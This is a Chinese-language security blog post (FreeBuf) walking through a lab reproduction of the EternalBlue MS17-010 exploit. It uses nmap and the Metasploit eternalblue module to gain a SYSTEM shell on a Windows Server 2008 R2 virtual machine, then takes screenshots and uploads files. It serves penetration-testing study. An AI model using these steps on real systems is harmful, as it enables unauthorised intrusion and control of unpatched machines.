freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

永恒之蓝漏洞复现实验
2022-03-11 14:20:49
所属地 内蒙古

一、实验环境

靶 机:Windows server 2008_r2 x64 ip:192.168.139.130

攻击机:kali_2021 ip:192.168.139.129

二、实验步骤

1、利用kali Linux 工具集nmap 扫描目标靶机:ip:192.168.139.130获取靶机端口信息

img

2、使用metasploit framwork工具集,键入命令msfconsole启动工具

img

3、执行search ms17-010命令,查看可利用的攻击模块

img

4、search ms17-010 查看可利用的模块

加载攻击模块 use exploit/windows/smb/ms17_010_eternalblue

查看攻击模块配置信息 show options

img

5、缺少攻击模块rhosts配置,set rhost 192.168.139.130进行配置

img

6、执行run命令,利用攻击模块攻击靶机

img

10、windows server 2008_r2 出现错误提示信息,攻击成功

img

11、msf进入命令行,shell进入命令行直接获取到system权限,执行chcp 65001 解决乱码问题。

img

12、查看用户

img

13、screenshot 捕捉屏幕

img

img

14、Systeminfo 查看系统信息

img

15、upload上传文件

img

Windows server 2008_r2的c盘windows/system32目录下

img

# 渗透测试 # 内网渗透 # Windows7 # 永恒之蓝漏洞
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录